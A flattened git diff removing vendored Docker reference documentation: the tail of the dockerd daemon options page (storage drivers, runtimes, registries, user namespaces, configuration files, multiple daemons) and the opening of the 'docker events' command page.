datadev and - metadatadev should be specified to completely avoid using the loopback - device. - - Example use: - - ```bash - $ sudo dockerd \ - --storage-opt dm.datadev=/dev/sdb1 \ - --storage-opt dm.metadatadev=/dev/sdc1 - ``` - -* `dm.metadatadev` - - (Deprecated, use `dm.thinpooldev`) - - Specifies a custom blockdevice to use for metadata for the thin pool. - - For best performance the metadata should be on a different spindle than the - data, or even better on an SSD. - - If setting up a new metadata pool it is required to be valid. This can be - achieved by zeroing the first 4k to indicate empty metadata, like this: - - ```bash - $ dd if=/dev/zero of=$metadata_dev bs=4096 count=1 - ``` - - Example use: - - ```bash - $ sudo dockerd \ - --storage-opt dm.datadev=/dev/sdb1 \ - --storage-opt dm.metadatadev=/dev/sdc1 - ``` - -* `dm.blocksize` - - Specifies a custom blocksize to use for the thin pool. The default - blocksize is 64K. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.blocksize=512K - ``` - -* `dm.blkdiscard` - - Enables or disables the use of blkdiscard when removing devicemapper - devices. This is enabled by default (only) if using loopback devices and is - required to resparsify the loopback file on image/container removal. - - Disabling this on loopback can lead to *much* faster container removal - times, but will make the space used in `/var/lib/docker` directory not be - returned to the system for other use when containers are removed. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.blkdiscard=false - ``` - -* `dm.override_udev_sync_check` - - Overrides the `udev` synchronization checks between `devicemapper` and `udev`. - `udev` is the device manager for the Linux kernel. - - To view the `udev` sync support of a Docker daemon that is using the - `devicemapper` driver, run: - - ```bash - $ docker info - [...] - Udev Sync Supported: true - [...] - ``` - - When `udev` sync support is `true`, then `devicemapper` and udev can - coordinate the activation and deactivation of devices for containers. - - When `udev` sync support is `false`, a race condition occurs between - the`devicemapper` and `udev` during create and cleanup. The race condition - results in errors and failures. (For information on these failures, see - [docker#4036](https://github.com/docker/docker/issues/4036)) - - To allow the `docker` daemon to start, regardless of `udev` sync not being - supported, set `dm.override_udev_sync_check` to true: - - ```bash - $ sudo dockerd --storage-opt dm.override_udev_sync_check=true - ``` - - When this value is `true`, the `devicemapper` continues and simply warns - you the errors are happening. - - > **Note:** - > The ideal is to pursue a `docker` daemon and environment that does - > support synchronizing with `udev`. For further discussion on this - > topic, see [docker#4036](https://github.com/docker/docker/issues/4036). - > Otherwise, set this flag for migrating existing Docker daemons to - > a daemon with a supported environment. - -* `dm.use_deferred_removal` - - Enables use of deferred device removal if `libdm` and the kernel driver - support the mechanism. - - Deferred device removal means that if device is busy when devices are - being removed/deactivated, then a deferred removal is scheduled on - device. And devices automatically go away when last user of the device - exits. - - For example, when a container exits, its associated thin device is removed. - If that device has leaked into some other mount namespace and can't be - removed, the container exit still succeeds and this option causes the - system to schedule the device for deferred removal. It does not wait in a - loop trying to remove a busy device. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.use_deferred_removal=true - ``` - -* `dm.use_deferred_deletion` - - Enables use of deferred device deletion for thin pool devices. By default, - thin pool device deletion is synchronous. Before a container is deleted, - the Docker daemon removes any associated devices. If the storage driver - can not remove a device, the container deletion fails and daemon returns. - - Error deleting container: Error response from daemon: Cannot destroy container - - To avoid this failure, enable both deferred device deletion and deferred - device removal on the daemon. - - ```bash - $ sudo dockerd \ - --storage-opt dm.use_deferred_deletion=true \ - --storage-opt dm.use_deferred_removal=true - ``` - - With these two options enabled, if a device is busy when the driver is - deleting a container, the driver marks the device as deleted. Later, when - the device isn't in use, the driver deletes it. - - In general it should be safe to enable this option by default. It will help - when unintentional leaking of mount point happens across multiple mount - namespaces. - -* `dm.min_free_space` - - Specifies the min free space percent in a thin pool require for new device - creation to succeed. This check applies to both free data space as well - as free metadata space. Valid values are from 0% - 99%. Value 0% disables - free space checking logic. If user does not specify a value for this option, - the Engine uses a default value of 10%. - - Whenever a new a thin pool device is created (during `docker pull` or during - container creation), the Engine checks if the minimum free space is - available. If sufficient space is unavailable, then device creation fails - and any relevant `docker` operation fails. - - To recover from this error, you must create more free space in the thin pool - to recover from the error. You can create free space by deleting some images - and containers from the thin pool. You can also add more storage to the thin - pool. - - To add more space to a LVM (logical volume management) thin pool, just add - more storage to the volume group container thin pool; this should automatically - resolve any errors. If your configuration uses loop devices, then stop the - Engine daemon, grow the size of loop files and restart the daemon to resolve - the issue. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.min_free_space=10% - ``` - -* `dm.xfs_nospace_max_retries` - - Specifies the maximum number of retries XFS should attempt to complete - IO when ENOSPC (no space) error is returned by underlying storage device. - - By default XFS retries infinitely for IO to finish and this can result - in unkillable process. To change this behavior one can set - xfs_nospace_max_retries to say 0 and XFS will not retry IO after getting - ENOSPC and will shutdown filesystem. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0 - ``` - -#### ZFS options - -* `zfs.fsname` - - Set zfs filesystem under which docker will create its own datasets. - By default docker will pick up the zfs filesystem where docker graph - (`/var/lib/docker`) is located. - - Example use: - - ```bash - $ sudo dockerd -s zfs --storage-opt zfs.fsname=zroot/docker - ``` - -#### Btrfs options - -* `btrfs.min_space` - - Specifies the minimum size to use when creating the subvolume which is used - for containers. If user uses disk quota for btrfs when creating or running - a container with **--storage-opt size** option, docker should ensure the - **size** cannot be smaller than **btrfs.min_space**. - - Example use: - - ```bash - $ sudo dockerd -s btrfs --storage-opt btrfs.min_space=10G - ``` - -#### Overlay2 options - -* `overlay2.override_kernel_check` - - Overrides the Linux kernel version check allowing overlay2. Support for - specifying multiple lower directories needed by overlay2 was added to the - Linux kernel in 4.0.0. However some older kernel versions may be patched - to add multiple lower directory support for OverlayFS. This option should - only be used after verifying this support exists in the kernel. Applying - this option on a kernel without this support will cause failures on mount. - -## Docker runtime execution options - -The Docker daemon relies on a -[OCI](https://github.com/opencontainers/runtime-spec) compliant runtime -(invoked via the `containerd` daemon) as its interface to the Linux -kernel `namespaces`, `cgroups`, and `SELinux`. - -By default, the Docker daemon automatically starts `containerd`. If you want to -control `containerd` startup, manually start `containerd` and pass the path to -the `containerd` socket using the `--containerd` flag. For example: - -```bash -$ sudo dockerd --containerd /var/run/dev/docker-containerd.sock -``` - -Runtimes can be registered with the daemon either via the -configuration file or using the `--add-runtime` command line argument. - -The following is an example adding 2 runtimes via the configuration: - -```json -{ - "default-runtime": "runc", - "runtimes": { - "runc": { - "path": "runc" - }, - "custom": { - "path": "/usr/local/bin/my-runc-replacement", - "runtimeArgs": [ - "--debug" - ] - } - } -} -``` - -This is the same example via the command line: - -```bash -$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement -``` - -> **Note**: defining runtime arguments via the command line is not supported. - -## Options for the runtime - -You can configure the runtime using options specified -with the `--exec-opt` flag. All the flag's options have the `native` prefix. A -single `native.cgroupdriver` option is available. - -The `native.cgroupdriver` option specifies the management of the container's -cgroups. You can specify only specify `cgroupfs` or `systemd`. If you specify -`systemd` and it is not available, the system errors out. If you omit the -`native.cgroupdriver` option,` cgroupfs` is used. - -This example sets the `cgroupdriver` to `systemd`: - -```bash -$ sudo dockerd --exec-opt native.cgroupdriver=systemd -``` - -Setting this option applies to all containers the daemon launches. - -Also Windows Container makes use of `--exec-opt` for special purpose. Docker user -can specify default container isolation technology with this, for example: - -```bash -$ sudo dockerd --exec-opt isolation=hyperv -``` - -Will make `hyperv` the default isolation technology on Windows. If no isolation -value is specified on daemon start, on Windows client, the default is -`hyperv`, and on Windows server, the default is `process`. - -## Daemon DNS options - -To set the DNS server for all Docker containers, use: - -```bash -$ sudo dockerd --dns 8.8.8.8 -``` - - -To set the DNS search domain for all Docker containers, use: - -```bash -$ sudo dockerd --dns-search example.com -``` - - -## Insecure registries - -Docker considers a private registry either secure or insecure. In the rest of -this section, *registry* is used for *private registry*, and `myregistry:5000` -is a placeholder example for a private registry. - -A secure registry uses TLS and a copy of its CA certificate is placed on the -Docker host at `/etc/docker/certs.d/myregistry:5000/ca.crt`. An insecure -registry is either not using TLS (i.e., listening on plain text HTTP), or is -using TLS with a CA certificate not known by the Docker daemon. The latter can -happen when the certificate was not found under -`/etc/docker/certs.d/myregistry:5000/`, or if the certificate verification -failed (i.e., wrong CA). - -By default, Docker assumes all, but local (see local registries below), -registries are secure. Communicating with an insecure registry is not possible -if Docker assumes that registry is secure. In order to communicate with an -insecure registry, the Docker daemon requires `--insecure-registry` in one of -the following two forms: - -* `--insecure-registry myregistry:5000` tells the Docker daemon that - myregistry:5000 should be considered insecure. -* `--insecure-registry 10.1.0.0/16` tells the Docker daemon that all registries - whose domain resolve to an IP address is part of the subnet described by the - CIDR syntax, should be considered insecure. - -The flag can be used multiple times to allow multiple registries to be marked -as insecure. - -If an insecure registry is not marked as insecure, `docker pull`, -`docker push`, and `docker search` will result in an error message prompting -the user to either secure or pass the `--insecure-registry` flag to the Docker -daemon as described above. - -Local registries, whose IP address falls in the 127.0.0.0/8 range, are -automatically marked as insecure as of Docker 1.3.2. It is not recommended to -rely on this, as it may change in the future. - -Enabling `--insecure-registry`, i.e., allowing un-encrypted and/or untrusted -communication, can be useful when running a local registry. However, -because its use creates security vulnerabilities it should ONLY be enabled for -testing purposes. For increased security, users should add their CA to their -system's list of trusted CAs instead of enabling `--insecure-registry`. - -## Legacy Registries - -Enabling `--disable-legacy-registry` forces a docker daemon to only interact with registries which support the V2 protocol. Specifically, the daemon will not attempt `push`, `pull` and `login` to v1 registries. The exception to this is `search` which can still be performed on v1 registries. - -## Running a Docker daemon behind an HTTPS_PROXY - -When running inside a LAN that uses an `HTTPS` proxy, the Docker Hub -certificates will be replaced by the proxy's certificates. These certificates -need to be added to your Docker host's configuration: - -1. Install the `ca-certificates` package for your distribution -2. Ask your network admin for the proxy's CA certificate and append them to - `/etc/pki/tls/certs/ca-bundle.crt` -3. Then start your Docker daemon with `HTTPS_PROXY=http://username:password@proxy:port/ dockerd`. - The `username:` and `password@` are optional - and are only needed if your - proxy is set up to require authentication. - -This will only add the proxy and authentication to the Docker daemon's requests - -your `docker build`s and running containers will need extra configuration to -use the proxy - -## Default Ulimits - -`--default-ulimit` allows you to set the default `ulimit` options to use for -all containers. It takes the same options as `--ulimit` for `docker run`. If -these defaults are not set, `ulimit` settings will be inherited, if not set on -`docker run`, from the Docker daemon. Any `--ulimit` options passed to -`docker run` will overwrite these defaults. - -Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to -set the maximum number of processes available to a user, not to a container. For details -please check the [run](run.md) reference. - -## Nodes discovery - -The `--cluster-advertise` option specifies the `host:port` or `interface:port` -combination that this particular daemon instance should use when advertising -itself to the cluster. The daemon is reached by remote hosts through this value. -If you specify an interface, make sure it includes the IP address of the actual -Docker host. For Engine installation created through `docker-machine`, the -interface is typically `eth1`. - -The daemon uses [libkv](https://github.com/docker/libkv/) to advertise -the node within the cluster. Some key-value backends support mutual -TLS. To configure the client TLS settings used by the daemon can be configured -using the `--cluster-store-opt` flag, specifying the paths to PEM encoded -files. For example: - -```bash -$ sudo dockerd \ - --cluster-advertise 192.168.1.2:2376 \ - --cluster-store etcd://192.168.1.2:2379 \ - --cluster-store-opt kv.cacertfile=/path/to/ca.pem \ - --cluster-store-opt kv.certfile=/path/to/cert.pem \ - --cluster-store-opt kv.keyfile=/path/to/key.pem -``` - -The currently supported cluster store options are: - -* `discovery.heartbeat` - - Specifies the heartbeat timer in seconds which is used by the daemon as a - keepalive mechanism to make sure discovery module treats the node as alive - in the cluster. If not configured, the default value is 20 seconds. - -* `discovery.ttl` - - Specifies the ttl (time-to-live) in seconds which is used by the discovery - module to timeout a node if a valid heartbeat is not received within the - configured ttl value. If not configured, the default value is 60 seconds. - -* `kv.cacertfile` - - Specifies the path to a local file with PEM encoded CA certificates to trust - -* `kv.certfile` - - Specifies the path to a local file with a PEM encoded certificate. This - certificate is used as the client cert for communication with the - Key/Value store. - -* `kv.keyfile` - - Specifies the path to a local file with a PEM encoded private key. This - private key is used as the client key for communication with the - Key/Value store. - -* `kv.path` - - Specifies the path in the Key/Value store. If not configured, the default value is 'docker/nodes'. - -## Access authorization - -Docker's access authorization can be extended by authorization plugins that your -organization can purchase or build themselves. You can install one or more -authorization plugins when you start the Docker `daemon` using the -`--authorization-plugin=PLUGIN_ID` option. - -```bash -$ sudo dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... -``` - -The `PLUGIN_ID` value is either the plugin's name or a path to its specification -file. The plugin's implementation determines whether you can specify a name or -path. Consult with your Docker administrator to get information about the -plugins available to you. - -Once a plugin is installed, requests made to the `daemon` through the command -line or Docker's Engine API are allowed or denied by the plugin. If you have -multiple plugins installed, at least one must allow the request for it to -complete. - -For information about how to create an authorization plugin, see [authorization -plugin](../../extend/plugins_authorization.md) section in the Docker extend section of this documentation. - - -## Daemon user namespace options - -The Linux kernel [user namespace support](http://man7.org/linux/man-pages/man7/user_namespaces.7.html) provides additional security by enabling -a process, and therefore a container, to have a unique range of user and -group IDs which are outside the traditional user and group range utilized by -the host system. Potentially the most important security improvement is that, -by default, container processes running as the `root` user will have expected -administrative privilege (with some restrictions) inside the container but will -effectively be mapped to an unprivileged `uid` on the host. - -When user namespace support is enabled, Docker creates a single daemon-wide mapping -for all containers running on the same engine instance. The mappings will -utilize the existing subordinate user and group ID feature available on all modern -Linux distributions. -The [`/etc/subuid`](http://man7.org/linux/man-pages/man5/subuid.5.html) and -[`/etc/subgid`](http://man7.org/linux/man-pages/man5/subgid.5.html) files will be -read for the user, and optional group, specified to the `--userns-remap` -parameter. If you do not wish to specify your own user and/or group, you can -provide `default` as the value to this flag, and a user will be created on your behalf -and provided subordinate uid and gid ranges. This default user will be named -`dockremap`, and entries will be created for it in `/etc/passwd` and -`/etc/group` using your distro's standard user and group creation tools. - -> **Note**: The single mapping per-daemon restriction is in place for now -> because Docker shares image layers from its local cache across all -> containers running on the engine instance. Since file ownership must be -> the same for all containers sharing the same layer content, the decision -> was made to map the file ownership on `docker pull` to the daemon's user and -> group mappings so that there is no delay for running containers once the -> content is downloaded. This design preserves the same performance for `docker -> pull`, `docker push`, and container startup as users expect with -> user namespaces disabled. - -### Starting the daemon with user namespaces enabled - -To enable user namespace support, start the daemon with the -`--userns-remap` flag, which accepts values in the following formats: - - - uid - - uid:gid - - username - - username:groupname - -If numeric IDs are provided, translation back to valid user or group names -will occur so that the subordinate uid and gid information can be read, given -these resources are name-based, not id-based. If the numeric ID information -provided does not exist as entries in `/etc/passwd` or `/etc/group`, daemon -startup will fail with an error message. - -**Example: starting with default Docker user management:** - -```bash -$ sudo dockerd --userns-remap=default -``` - -When `default` is provided, Docker will create - or find the existing - user and group -named `dockremap`. If the user is created, and the Linux distribution has -appropriate support, the `/etc/subuid` and `/etc/subgid` files will be populated -with a contiguous 65536 length range of subordinate user and group IDs, starting -at an offset based on prior entries in those files. For example, Ubuntu will -create the following range, based on an existing user named `user1` already owning -the first 65536 range: - -```bash -$ cat /etc/subuid -user1:100000:65536 -dockremap:165536:65536 -``` - -If you have a preferred/self-managed user with subordinate ID mappings already -configured, you can provide that username or uid to the `--userns-remap` flag. -If you have a group that doesn't match the username, you may provide the `gid` -or group name as well; otherwise the username will be used as the group name -when querying the system for the subordinate group ID range. - -The output of `docker info` can be used to determine if the daemon is running -with user namespaces enabled or not. If the daemon is configured with user -namespaces, the Security Options entry in the response will list "userns" as -one of the enabled security features. - -### Detailed information on `subuid`/`subgid` ranges - -Given potential advanced use of the subordinate ID ranges by power users, the -following paragraphs define how the Docker daemon currently uses the range entries -found within the subordinate range files. - -The simplest case is that only one contiguous range is defined for the -provided user or group. In this case, Docker will use that entire contiguous -range for the mapping of host uids and gids to the container process. This -means that the first ID in the range will be the remapped root user, and the -IDs above that initial ID will map host ID 1 through the end of the range. - -From the example `/etc/subuid` content shown above, the remapped root -user would be uid 165536. - -If the system administrator has set up multiple ranges for a single user or -group, the Docker daemon will read all the available ranges and use the -following algorithm to create the mapping ranges: - -1. The range segments found for the particular user will be sorted by *start ID* ascending. -2. Map segments will be created from each range in increasing value with a length matching the length of each segment. Therefore the range segment with the lowest numeric starting value will be equal to the remapped root, and continue up through host uid/gid equal to the range segment length. As an example, if the lowest segment starts at ID 1000 and has a length of 100, then a map of 1000 -> 0 (the remapped root) up through 1100 -> 100 will be created from this segment. If the next segment starts at ID 10000, then the next map will start with mapping 10000 -> 101 up to the length of this second segment. This will continue until no more segments are found in the subordinate files for this user. -3. If more than five range segments exist for a single user, only the first five will be utilized, matching the kernel's limitation of only five entries in `/proc/self/uid_map` and `proc/self/gid_map`. - -### Disable user namespace for a container - -If you enable user namespaces on the daemon, all containers are started -with user namespaces enabled. In some situations you might want to disable -this feature for a container, for example, to start a privileged container (see -[user namespace known restrictions](#user-namespace-known-restrictions)). -To enable those advanced features for a specific container use `--userns=host` -in the `run/exec/create` command. -This option will completely disable user namespace mapping for the container's user. - -### User namespace known restrictions - -The following standard Docker features are currently incompatible when -running a Docker daemon with user namespaces enabled: - - - sharing PID or NET namespaces with the host (`--pid=host` or `--net=host`) - - Using `--privileged` mode flag on `docker run` (unless also specifying `--userns=host`) - -In general, user namespaces are an advanced feature and will require -coordination with other capabilities. For example, if volumes are mounted from -the host, file ownership will have to be pre-arranged if the user or -administrator wishes the containers to have expected access to the volume -contents. Note that when using external volume or graph driver plugins, those -external software programs must be made aware of user and group mapping ranges -if they are to work seamlessly with user namespace support. - -Finally, while the `root` user inside a user namespaced container process has -many of the expected admin privileges that go along with being the superuser, the -Linux kernel has restrictions based on internal knowledge that this is a user namespaced -process. The most notable restriction that we are aware of at this time is the -inability to use `mknod`. Permission will be denied for device creation even as -container `root` inside a user namespace. - -## Miscellaneous options - -IP masquerading uses address translation to allow containers without a public -IP to talk to other machines on the Internet. This may interfere with some -network topologies and can be disabled with `--ip-masq=false`. - -Docker supports softlinks for the Docker data directory (`/var/lib/docker`) and -for `/var/lib/docker/tmp`. The `DOCKER_TMPDIR` and the data directory can be -set like this: - - DOCKER_TMPDIR=/mnt/disk2/tmp /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1 - # or - export DOCKER_TMPDIR=/mnt/disk2/tmp - /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1 - -## Default cgroup parent - -The `--cgroup-parent` option allows you to set the default cgroup parent -to use for containers. If this option is not set, it defaults to `/docker` for -fs cgroup driver and `system.slice` for systemd cgroup driver. - -If the cgroup has a leading forward slash (`/`), the cgroup is created -under the root cgroup, otherwise the cgroup is created under the daemon -cgroup. - -Assuming the daemon is running in cgroup `daemoncgroup`, -`--cgroup-parent=/foobar` creates a cgroup in -`/sys/fs/cgroup/memory/foobar`, whereas using `--cgroup-parent=foobar` -creates the cgroup in `/sys/fs/cgroup/memory/daemoncgroup/foobar` - -The systemd cgroup driver has different rules for `--cgroup-parent`. Systemd -represents hierarchy by slice and the name of the slice encodes the location in -the tree. So `--cgroup-parent` for systemd cgroups should be a slice name. A -name can consist of a dash-separated series of names, which describes the path -to the slice from the root slice. For example, `--cgroup-parent=user-a-b.slice` -means the memory cgroup for the container is created in -`/sys/fs/cgroup/memory/user.slice/user-a.slice/user-a-b.slice/docker-.scope`. - -This setting can also be set per container, using the `--cgroup-parent` -option on `docker create` and `docker run`, and takes precedence over -the `--cgroup-parent` option on the daemon. - -## Daemon Metrics - -The `--metrics-addr` option takes a tcp address to serve the metrics API. -This feature is still experimental, therefore, the daemon must be running in experimental -mode for this feature to work. - -To serve the metrics API on localhost:1337 you would specify `--metrics-addr 127.0.0.1:1337` -allowing you to make requests on the API at `127.0.0.1:1337/metrics` to receive metrics in the -[prometheus](https://prometheus.io/docs/instrumenting/exposition_formats/) format. - -If you are running a prometheus server you can add this address to your scrape configs -to have prometheus collect metrics on Docker. For more information -on prometheus you can view the website [here](https://prometheus.io/). - -```yml -scrape_configs: - - job_name: 'docker' - static_configs: - - targets: ['127.0.0.1:1337'] -``` - -Please note that this feature is still marked as experimental as metrics and metric -names could change while this feature is still in experimental. Please provide -feedback on what you would like to see collected in the API. - -## Daemon configuration file - -The `--config-file` option allows you to set any configuration option -for the daemon in a JSON format. This file uses the same flag names as keys, -except for flags that allow several entries, where it uses the plural -of the flag name, e.g., `labels` for the `label` flag. - -The options set in the configuration file must not conflict with options set -via flags. The docker daemon fails to start if an option is duplicated between -the file and the flags, regardless their value. We do this to avoid -silently ignore changes introduced in configuration reloads. -For example, the daemon fails to start if you set daemon labels -in the configuration file and also set daemon labels via the `--label` flag. -Options that are not present in the file are ignored when the daemon starts. - -### Linux configuration file - -The default location of the configuration file on Linux is -`/etc/docker/daemon.json`. The `--config-file` flag can be used to specify a - non-default location. - -This is a full example of the allowed configuration options on Linux: - -```json -{ - "authorization-plugins": [], - "dns": [], - "dns-opts": [], - "dns-search": [], - "exec-opts": [], - "exec-root": "", - "experimental": false, - "storage-driver": "", - "storage-opts": [], - "labels": [], - "live-restore": true, - "log-driver": "", - "log-opts": {}, - "mtu": 0, - "pidfile": "", - "graph": "", - "cluster-store": "", - "cluster-store-opts": {}, - "cluster-advertise": "", - "max-concurrent-downloads": 3, - "max-concurrent-uploads": 5, - "shutdown-timeout": 15, - "debug": true, - "hosts": [], - "log-level": "", - "tls": true, - "tlsverify": true, - "tlscacert": "", - "tlscert": "", - "tlskey": "", - "swarm-default-advertise-addr": "", - "api-cors-header": "", - "selinux-enabled": false, - "userns-remap": "", - "group": "", - "cgroup-parent": "", - "default-ulimits": {}, - "init": false, - "init-path": "/usr/libexec/docker-init", - "ipv6": false, - "iptables": false, - "ip-forward": false, - "ip-masq": false, - "userland-proxy": false, - "userland-proxy-path": "/usr/libexec/docker-proxy", - "ip": "0.0.0.0", - "bridge": "", - "bip": "", - "fixed-cidr": "", - "fixed-cidr-v6": "", - "default-gateway": "", - "default-gateway-v6": "", - "icc": false, - "raw-logs": false, - "registry-mirrors": [], - "seccomp-profile": "", - "insecure-registries": [], - "disable-legacy-registry": false, - "default-runtime": "runc", - "oom-score-adjust": -500, - "runtimes": { - "runc": { - "path": "runc" - }, - "custom": { - "path": "/usr/local/bin/my-runc-replacement", - "runtimeArgs": [ - "--debug" - ] - } - } -} -``` - -### Windows configuration file - -The default location of the configuration file on Windows is - `%programdata%\docker\config\daemon.json`. The `--config-file` flag can be - used to specify a non-default location. - -This is a full example of the allowed configuration options on Windows: - -```json -{ - "authorization-plugins": [], - "dns": [], - "dns-opts": [], - "dns-search": [], - "exec-opts": [], - "experimental": false, - "storage-driver": "", - "storage-opts": [], - "labels": [], - "log-driver": "", - "mtu": 0, - "pidfile": "", - "graph": "", - "cluster-store": "", - "cluster-advertise": "", - "max-concurrent-downloads": 3, - "max-concurrent-uploads": 5, - "shutdown-timeout": 15, - "debug": true, - "hosts": [], - "log-level": "", - "tlsverify": true, - "tlscacert": "", - "tlscert": "", - "tlskey": "", - "swarm-default-advertise-addr": "", - "group": "", - "default-ulimits": {}, - "bridge": "", - "fixed-cidr": "", - "raw-logs": false, - "registry-mirrors": [], - "insecure-registries": [], - "disable-legacy-registry": false -} -``` - -### Configuration reloading - -Some options can be reconfigured when the daemon is running without requiring -to restart the process. We use the `SIGHUP` signal in Linux to reload, and a global event -in Windows with the key `Global\docker-daemon-config-$PID`. The options can -be modified in the configuration file but still will check for conflicts with -the provided flags. The daemon fails to reconfigure itself -if there are conflicts, but it won't stop execution. - -The list of currently supported options that can be reconfigured is this: - -- `debug`: it changes the daemon to debug mode when set to true. -- `cluster-store`: it reloads the discovery store with the new address. -- `cluster-store-opts`: it uses the new options to reload the discovery store. -- `cluster-advertise`: it modifies the address advertised after reloading. -- `labels`: it replaces the daemon labels with a new set of labels. -- `live-restore`: Enables [keeping containers alive during daemon downtime](https://docs.docker.com/engine/admin/live-restore/). -- `max-concurrent-downloads`: it updates the max concurrent downloads for each pull. -- `max-concurrent-uploads`: it updates the max concurrent uploads for each push. -- `default-runtime`: it updates the runtime to be used if not is - specified at container creation. It defaults to "default" which is - the runtime shipped with the official docker packages. -- `runtimes`: it updates the list of available OCI runtimes that can - be used to run containers -- `authorization-plugin`: specifies the authorization plugins to use. -- `insecure-registries`: it replaces the daemon insecure registries with a new set of insecure registries. If some existing insecure registries in daemon's configuration are not in newly reloaded insecure resgitries, these existing ones will be removed from daemon's config. - -Updating and reloading the cluster configurations such as `--cluster-store`, -`--cluster-advertise` and `--cluster-store-opts` will take effect only if -these configurations were not previously configured. If `--cluster-store` -has been provided in flags and `cluster-advertise` not, `cluster-advertise` -can be added in the configuration file without accompanied by `--cluster-store`. -Configuration reload will log a warning message if it detects a change in -previously configured cluster configurations. - - -## Running multiple daemons - -> **Note:** Running multiple daemons on a single host is considered as "experimental". The user should be aware of -> unsolved problems. This solution may not work properly in some cases. Solutions are currently under development -> and will be delivered in the near future. - -This section describes how to run multiple Docker daemons on a single host. To -run multiple daemons, you must configure each daemon so that it does not -conflict with other daemons on the same host. You can set these options either -by providing them as flags, or by using a [daemon configuration file](#daemon-configuration-file). - -The following daemon options must be configured for each daemon: - -```bash --b, --bridge= Attach containers to a network bridge ---exec-root=/var/run/docker Root of the Docker execdriver --g, --graph=/var/lib/docker Root of the Docker runtime --p, --pidfile=/var/run/docker.pid Path to use for daemon PID file --H, --host=[] Daemon socket(s) to connect to ---iptables=true Enable addition of iptables rules ---config-file=/etc/docker/daemon.json Daemon configuration file ---tlscacert="~/.docker/ca.pem" Trust certs signed only by this CA ---tlscert="~/.docker/cert.pem" Path to TLS certificate file ---tlskey="~/.docker/key.pem" Path to TLS key file -``` - -When your daemons use different values for these flags, you can run them on the same host without any problems. -It is very important to properly understand the meaning of those options and to use them correctly. - -- The `-b, --bridge=` flag is set to `docker0` as default bridge network. It is created automatically when you install Docker. -If you are not using the default, you must create and configure the bridge manually or just set it to 'none': `--bridge=none` -- `--exec-root` is the path where the container state is stored. The default value is `/var/run/docker`. Specify the path for -your running daemon here. -- `--graph` is the path where images are stored. The default value is `/var/lib/docker`. To avoid any conflict with other daemons -set this parameter separately for each daemon. -- `-p, --pidfile=/var/run/docker.pid` is the path where the process ID of the daemon is stored. Specify the path for your -pid file here. -- `--host=[]` specifies where the Docker daemon will listen for client connections. If unspecified, it defaults to `/var/run/docker.sock`. -- `--iptables=false` prevents the Docker daemon from adding iptables rules. If -multiple daemons manage iptables rules, they may overwrite rules set by another -daemon. Be aware that disabling this option requires you to manually add -iptables rules to expose container ports. If you prevent Docker from adding -iptables rules, Docker will also not add IP masquerading rules, even if you set -`--ip-masq` to `true`. Without IP masquerading rules, Docker containers will not be -able to connect to external hosts or the internet when using network other than -default bridge. -- `--config-file=/etc/docker/daemon.json` is the path where configuration file is stored. You can use it instead of -daemon flags. Specify the path for each daemon. -- `--tls*` Docker daemon supports `--tlsverify` mode that enforces encrypted and authenticated remote connections. -The `--tls*` options enable use of specific certificates for individual daemons. - -Example script for a separate “bootstrap” instance of the Docker daemon without network: - -```bash -$ sudo dockerd \ - -H unix:///var/run/docker-bootstrap.sock \ - -p /var/run/docker-bootstrap.pid \ - --iptables=false \ - --ip-masq=false \ - --bridge=none \ - --graph=/var/lib/docker-bootstrap \ - --exec-root=/var/run/docker-bootstrap -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/events.md b/vendor/github.com/docker/docker/docs/reference/commandline/events.md deleted file mode 100644 index baa966d620..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/events.md +++ /dev/null @@ -1,217 +0,0 @@ ---- -title: "events" -description: "The events command description and usage" -keywords: "events, container, report" ---- - - - -# events - -```markdown -Usage: docker events [OPTIONS] - -Get real time events from the server - -Options: - -f, --filter value Filter output based on conditions provided (default []) - --format string Format the output using the given Go template - --help Print usage - --since string Show all events created since timestamp - --until string Stream events until this timestamp -``` - -Docker containers report the following events: - - attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, health_status, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update - -Docker images report the following events: - - delete, import, load, pull, push, save, tag, untag - -Docker plugins report the following events: - - install, enable, disable, remove - -Docker volumes report the following events: - - create, mount, unmount, destroy - -Docker networks report the following events: - - create, connect, disconnect, destroy - -Docker daemon report the following events: - - reload - -The `--since` and `--until` parameters can be Unix timestamps, date formatted -timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed -relative to the client machine’s time. If you do not provide the `--since` option, -the command returns only new and/or live events. Supported formats for date -formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`, -`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local -timezone on the client will be used if you do not provide either a `Z` or a -`+-00:00` timezone offset at the end of the timestamp. When providing Unix -timestamps enter seconds[.nanoseconds], where seconds is the number of seconds -that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap -seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a -fraction of a second no more than nine digits long. - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". If you would -like to use multiple filters, pass multiple flags (e.g., -`--filter "foo=bar" --filter "bif=baz"`) - -Using the same filter multiple times will be handled as a *OR*; for example -`--filter container=588a23dac085 --filter container=a8f7720b8c22` will display -events for container 588a23dac085 *OR* container a8f7720b8c22 - -Using multiple filters will be handled as a *AND*; for example -`--filter container=588a23dac085 --filter event=start` will display events for -container container 588a23dac085 *AND* the event type is *start* - -The currently supported filters are: - -* container (`container=`) -* event (`event=`) -* image (`image=`) -* plugin (experimental) (`plugin=`) -* label (`label=` or `label==`) -* type (`type=`) -* volume (`volume=`) -* network (`network=`) -* daemon (`daemon=`) - -## Format - -If a format (`--format`) is specified, the given template will be executed -instead of the default -format. Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. - -If a format is set to `{{json .}}`, the events are streamed as valid JSON -Lines. For information about 